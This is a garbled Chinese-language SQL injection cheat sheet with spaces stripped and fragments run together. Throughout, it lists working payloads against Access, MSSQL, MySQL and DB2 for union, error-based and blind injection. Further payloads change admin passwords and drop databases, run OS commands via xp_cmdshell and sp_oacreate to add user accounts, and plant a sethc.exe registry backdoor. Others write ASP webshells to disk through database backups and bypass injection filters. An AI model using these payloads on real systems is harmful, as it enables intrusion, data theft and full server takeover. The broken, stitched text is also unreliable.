ANDAND與AND1=2執(zhí)行SQL當執(zhí)行/url.asp?id=1andexists(selectidfrom[admin])selectselect*fromtablewhereid=1andexists(selectidfromSQL的查詢執(zhí)行結果。當執(zhí)行/url.asp?id=1and1=2unionallselect1,2,fromadminSelectSelect*fromtablewhereid=1and1=2unionallselect1,2,……from /url.asp?id=1and /url.asp?id=1and/url.asp?id=1anduser MSSQL/url.asp?id=1'and /url.asp?id=1'and/url.asp?id=1anduserchar(124)=0and MSSQL/url.asp?search=t%25'and25'='&/url.asp?search=t%25'and 判斷搜索過濾不嚴%25當作/url.asp?search=t%25'and1=1and &/url.asp?search=t%25'and1=2and/url.asp?search=t%25'anduserchar(124)=0and MSSQLSELECTSELECT*FROMnewswhere(((info)Like"t%"))and注意:當你嘗試在OfficeAccess中測試這條命令時,該語句將無法查詢出正確結果,因為ANSISQL中的通配符(%)和(_)只能在 Access數(shù)據(jù)庫引擎和AccessOLEDBProvider中使用。如果通過Access或DAO使用,它們將被視為文字。And(selectcount(*)fromMSSQLAnd(selectcount(*)fromAccess猜表名、列名(字段名Andexists(select*fromadminadminAndexists(selectusernamefromadmin判斷admin表下是否存在名為usernameUNIONAnd1=2UnionallSelect1,2,fromSQL語句中的“ 某些表/SQL中的保留關鍵字或系統(tǒng)變量對象,都必須使用And(selectCount(1)from countAnd(selectCount(1)from[admin]where1=1)between0And(selecttop1len(password)fromtopAnd(selecttop1len(password)fromadmin)between0猜字段的ASCII值AndAnd(selecttop1asc(mid(字段名,1,1))from表名;And(selecttop1unicode(substring(字段名,1,1))from表名between30and130//And(selecttop1ord(password,1,1)from MssqlphpordMid函數(shù)用于定位字符串里的字符,AscAscii編碼。97a、49例:asc(mid(username,2,1))表示使用midusername2asciiAndAnd(selecttop1left(username,1)fromAnd(selecttop1left(username,2)from left 
AccessAccess舉例說明:(7個字段,admin3個字段unionunionselect1,2,3,4,5,6,7,8,9,10fromadminunionselect1,2,3,4,5,6,7,*fromadminunionunionselect1,2,3,4,*from(adminasainnerjoinadminasbonunionselect1,2,3,4,a.id,*from(adminasainnerjoinadminasbona.id=b.id)unionselect1,2,3,4,a.id,b.id,*fromunionselect1,2,3,4,a.id,*from(adminasainnerjoinadminasbona.id=b.id)unionselect1,2,3,4,a.id,b.id,*from(adminasainnerjoinadminasbona.id=b.id)unionunionselect1,2,3,a.id,b.id,c.id,*from((adminasainnerjoinadminasbona.id=b.id)innerjoinadminasconunionselect1,a.id,b.id,c.id,d.id,*from(((adminasainnerjoinadminasbona.id=b.id)innerjoinadminascona.id=c.id)innerjoinadminasdona.id=d.id)利用注射點判斷數(shù)據(jù)庫WEB利用注射點判斷數(shù)據(jù)庫WEB得到客戶端主機名與服務端主機名selecthost_name();select 測試MSSQL;--SQLand1=(selectIS_SRVROLEMEMBER('serveradmin'));-and1=(selectIS_SRVROLEMEMBER('setupadmin'));-and1=(selectIS_SRVROLEMEMBER('securityadmin'));-and1=(selectIS_SRVROLEMEMBER('diskadmin'));-and1=(selectIS_SRVROLEMEMBER('bulkadmin'));-and1=(selectIS_MEMBER('db_owner'));-HAVING暴表名、字段名t'having1=1-t'groupbyidhaving1=1-t'groupbyid,useridhavingOLEDBProviderforSQLServer80040e14’users.IDGROUPBY基于時間的SQL注入(延時注入) 5'-- -- Mssql注意:查詢使用的值(55秒)1秒(WAITFORDELAY'0:0:1')24小時(WAITFORDELAY取得合理平衡。較小的值能為我們提供較快的響應,但可能會因為受未預料的網(wǎng)絡延遲或服務器最大負 .htmMSSQL2000+注釋符SQL 、 、andand userSQLserverint出錯 如果是sa權限。提示的是將“dbo”轉換成int出錯and(select SQL;declare@aint and(selectcount(1)from and xtyp(i(and(selecttop1namefrom(selecttop1id,namefromsysobjectswherextype=char(85))Torderbyid and(selecttop1namefrom(selecttop2id,namefromsysobjectswherextype=char(85))Torderbyid 
and(selecttop1namefromsysobjectswhereand(selecttop1namefromsysobjectswherextype='U'andnamenotin第一個表名)COL_NAME(able_id,column_id)table_id是表的標識號,column_id是列的標識號。object_id(admin)adminsysobjects中的標識號,column_id=1,2,3admin1,2,3列,and(selecttop1col_name(object_id('表段'),1)fromand(selecttop1col_name(object_id('表段'),2)fromand(selecttop1from表段and(selecttop1fromwhere;update;updateset列名='內容where;updateadminsetpassword='123'where;insertintovalues(內容;insertintoadminvalues(admin,123)-;dropdatabase SAandSAand1=(SELECTcount(*)FROMmaster.dbo.sysobjectsWHERExtype='X'ANDname= 判斷 是否被刪除,返回正常說明存在 ', 恢復 ;exec 'netuserMyName123456 cmd;exec 'dir;exec SAcreatetabledirs(pathsvarchar(100),idint)insertdirsexecmaster.dbo.xp_dirtree'c:\'and(selecttop1pathsfromdirs)>0and(selecttop1pathsfromdirswherepathsnotin('createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));- 的insertintotemp(id)exec Sa點執(zhí)行 可以結合IIS的adsutil.vbs快速查表根鍵,xp_regread表根鍵,xp_regread根鍵,子鍵,xp_regwrite根鍵,子鍵,值名,值類型xp_regdeletevalue根鍵,子鍵,值名execxp_regdeletekey根鍵,子鍵2REG_SZ表示字符型,REG_DWORD exec exec 寫 // usecreatetableusecreatetablecmd(strinsertintocmd(str)values('<%evalrequest(chr(35))%>');backupdatabasemodeltodisk='c:\l.asp';and(select and(select Windowsanduser_name()='dbo' and(selectuser_name())>0// and(select Public注意:SQLServerAgent服務必須開啟,Selecthost_name()獲取當前庫服務器機器名USEUSEEXECsp_add_job@job_name='GetSystemOnSQL',@enabled=1,@delete_level=EXECsp_add_jobstep@job_name='GetSystemOnSQL',@step_name='Execmysql',@subsystem= "netuseriislogerhook/add>c:\fish.txt"'''''',N''Master'''EXECsp_add_jobserver@job_name='GetSystemOnSQL',@server_nameSQL服務器名EXECsp_start_job@job_name= MSSQL2005手工盲注Andsubstring((selectAndsubstring((selectAndAnd(selectcount(*)frommaster.dbo.sysdatabaseswhere And(selectcount(*)frommaster.dbo.sysdatabaseswheredbid=5and dbidAnd(selectcount(*)frommaster.dbo.sysdatabaseswheredbid=5and And(selectcount(*)And(selectcount(*)fromdatabase.dbo.sysobjectswherextype='u'andnamelike 
And(selectcount(*)fromdatabase.dbo.sysobjectswherenamein(selecttop1namefromdatabase.dbo.sysobjectswherextype='u')andlen(name)=9)=1 And(selectcount(*)fromdatabase.dbo.sysobjectswherenamein(selecttop1namefromdatabase.dbo.sysobjectswherextype='u')andascii(substring(name,1,1))>90)=1 And(selectcount(*)fromdatabase.dbo.sysobjectswherenamein(selecttop1namefromdatabase.dbo.sysobjectswherextype='u'andnamenotin('table1'))andascii(substring(name,1,1))>90)=1 猜第二個表名(And(selectcount(*)fromdatabase.dbo.syscolumnswherenamein(selecttop1namefromdatabase_db.dbo.syscolumnswhereid=object_id('database.dbo.table'))And(selectcount(*)fromdatabase.dbo.syscolumnswherenamein(selecttop1namefromdatabase_db.dbo.syscolumnswhereid=object_id('database.dbo.table'))andascii(substring(name,1,1))>90)=1 And(selectcount(*)fromdatabase.dbo.syscolumnswherenamein(selecttop1namefromdatabase_db.dbo.syscolumnswhereid=object_id('database.dbo.table')andnamenotin('column1'))and 猜第二個(And(selectcount(*)fromdatabase.dbo.tablewherenamein(selecttop1namefromdatabase_db.dbo.table)andAnd(selectcount(*)fromdatabase.dbo.tablewherenamein(selecttop1namefromdatabase_db.dbo.table)and MMSSQLexec 'netexec 'net execexecexecmaster..xp_regwriteExecution\WindowsNT\CurrentVersion\Imageexecmaster..xp_regwriteExecution\WindowsNT\CurrentVersion\Image 執(zhí)行命令(netdeclare@aint;execmaster..sp_oacreate'WScript.S ',@aoutput;execmaster..sp_oamethod@a,'run',null,'cmd/cnetuser>C:\WINDOWS\Temp\~098611.tmp',0,'true'Ifobject_id('dark_temp')isnotnulldroptabledark_temp;createtabledark_temp(aanvarchar(4000));bulkinsertdark_tempfrom'C:\WINDOWS\Temp\~098611.tmp'execexecSelect*From ("cmd/cnetuser>Ifobject_id('dark_temp')isnotnulldroptabledark_temp;createtabledark_temp(aanvarchar(4000));bulkdark_tempFSOmaster..xp_unpackcab'C:\windows\temp\~098611.tmp','C:\WINDOWS\system32',1,'Sethc.exe'Cab拷貝文件(cmd.exetomaster..xp_unpackcab'C:\windows\temp\~098611.tmp','C:\WINDOWS\system32',1,'Sethc.exe'能開啟 
EXECmaster..sp_configure'showadvancedoptions',1;RECONFIGURE;EXECmaster..sp_configure'AdHocDistributed11.LogbackupalterdatabaseSetrecoveryfull;dumptransactionwithno_log;Ifobject_id('dark_temp')isnotnulldroptabledark_temp;createtabledark_temp(aasql_variantprimarykey)backupdatabasetodisk='C:\windows\temp\~098611.tmp'withinsertdark_tempvalues('<%evalbackuplog數(shù)據(jù)庫名to :DarkBlade1.3 MMSSQL11createtable[dbo].[jm_tmp([cmdimage]) 2、declare@asysname,@snvarchar(4000)select@a=db_name(),@s=0X6A006D00640063007700database@atodisk@s 備份數(shù)據(jù)庫,@s為備份名稱(jmdcw16進制轉換2insertinto[jm_tmp](cmd//將一句話木馬“<%execute(request("l"))%>163declare@asysname,@snvarchar(4000)select@a=db_name(),@s='C:\Program Shared\WebServerExtensions\40\isapi\jm.asp'backupdatabase@atodisk=@sWITHDIFFERENTIAL,FORMAT–//對數(shù)據(jù)庫實行差異備份,備份的保存路徑暫定為C 5、droptable[jm_tmp 數(shù)據(jù)庫!其實還有很多小技巧,如果權限足夠的話,可以備份到同一段的其他機器,比如域內的,或者 11droptablejm_tmp];createtablejm_tmp](valuenavrchar(4000)null,datanvarchar(4000)null//1deletejm_tmp];insert[jm_tmp]exec// 插到表字段3、and(selecttop1cast([data]asnvarchar(4000)+char(124)from[jm_tmp]orderby[data] //4、droptablejm_tmp// 11、droptablejm_tmp];createtablejm_tmp](subdirectorynvarchar(400)NULL,depthtinyintNULL,[file]bitNULL//[//C3、and1=(selecttop1cast([subdirectory]asnvarchar(400))+char(124)+cast([file]asFrom(SelectTop1[subdirectory],[file]From[jm_tmp]ORDERBY[file],[subdirectory])TORDERBYdesc,[subdirectory]desc) //4、and1=(selecttop1cast([subdirectory]asnvarchar(400))+char(124)+cast([file]asFrom(SelectTop2[subdirectory],[file]From[jm_tmp]ORDERBY[file],[subdirectory])TORDERBY[file]desc,[subdirectory]desc)‘ 5、and1=(selecttop1cast([subdirectory]asnvarchar(400))+char(124)+cast([file]asnvarchar(1))+char(124)From(SelectTopX[subdirectory],[file]From[jm_tmp]ORDERBY[file],[subdirectory])TORDERBY[file]desc,[subdirectory]desc) X6、droptablejm_tmp Mysql5.xMysql5.xselectSCHEMA_NAMEfrominformation_schema.SCHEMATAlimit5,1/*// 
5,1155,1/*TABLE_SCHEMA=16進制selectCOLUMN_NAMEfrominformation_schema.COLUMNSwherelimitMYSQLand1=2unionselect and1=2unionselect HEXlimitOrderby and1=2unionselect HEXlimit利用利用Mysql ark ark根unionselect php的max_execution_time最大執(zhí)行時間默認配置,mysql錯IDSinformation_schemamysql>mysql>SELECT*FROM(SELECT*FROMuserAJOINuserB)C;ERROR1060(42S21):Duplicatecolumnname'Host'mysql>SELECT*FROM(SELECT*FROMuserAJOINuserBUSING(Host))C;ERROR1060(42S21):Duplicatecolumnname'User'mysql>SELECT*FROM(SELECT*FROMuserAJOINuserBUSING(Host,User))C;ERROR1060(42S21):Duplicatecolumnname'Password'64mysql>mysql>SELECT1FROM(selectcount(*),concat(floor(rand(0)*2),(SELECT'x'))afrominformation_schema.tablesgroupbya)b;ERROR1062(23000):Duplicateentry'1x'forkey MySQL64MID慢慢 /2009/10/advanced-sql-injection-lab-full-pack.html mysql>mysql>SELECT1FROMdede_adminWHEREupdatexml(1,(SELECT,MID(pwd,4,16),0x5d)FROMERROR1105(HY000):XPATHsyntaxerror:IBMDB2注射語句 selectselectNAMEfromSYSIBM.SYSCOLUMNSwhereTBCREATOR=''and selectselectNAMEfromSYSIBM.SYSTABLESwhereCREATOR=USERFETCHFIRST1ROWS sqlservertopSUBSTR(string,SUBSTR(string,position, //ascandand(selectASCII(SUBSTR(NAME,1,1))fromSYSIBM.SYSTABLESwhereCREATOR=USERFETCHFIRST1ROWSONLY)>50– tableascii繞過防注入方法URLEncode編碼,URLEncode編碼,ASCIIor1=1or'swords'mssqlor'swords'or1=1or1=1判斷繞過,or'swords'or'swordsor'swordsN'swordsNmssqlservernvarchar類型,它起到類型轉IDS。or'swords'or'swords'=‘sw'+'ords';EXEC(‘IN'+'SERTINTO'+'…..'or'swords'LIKE'sw'or'swords'LIKE'sw'LIKE的思路差不多,LIKE的思路差不多,or'swords'INor'swordsBETWEENor'swordsBETWEENrw'ANDor'swords'>'sw'oror'swords'>'sw'or'swords'<'tw'or1<3UNION/**/Select/**/user,pwd,from ,如U/**/NION/**/SE/**/LECT/**/user,pwdfromEE00EE00 值給a,然后調用變量a最終執(zhí)行我們輸 令。變量a可以是任何命令。如下declare@asysnameselect@a=exec %20@a;-“netuserangelpassphpsafe_modephpsafe_modeOn的時候會過濾'為\'如果前面加個%d5的話,就和%5c構成一個漢字:誠使用%And使用%Andexi%%sts(s%%elect*%fr%%omASC